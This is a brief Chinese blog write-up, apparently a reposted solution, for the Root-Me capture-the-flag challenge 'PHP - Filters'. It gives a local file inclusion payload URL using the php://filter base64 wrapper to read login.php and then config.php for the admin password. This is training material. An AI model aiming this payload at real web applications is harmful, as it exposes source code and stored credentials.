PHP - Filters
2021-05-08 11:32
标签:serve 使用 pass nbsp convert 技术 php 一个 图片 Retrieve the administrator password of this application. 对文件包含的介绍------------第一个链接需要谷歌 https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601 https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/ 此处使用php://filter伪协议: payload: http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php 读取到login.php的内容后base64解密: 再根据php代码,读取config.php的文件内容: PHP - Filters 标签:serve 使用 pass nbsp convert 技术 php 一个 图片 原文地址:https://www.cnblogs.com/abbin-blog/p/12079191.html
下一篇:Node.js中的fs 模块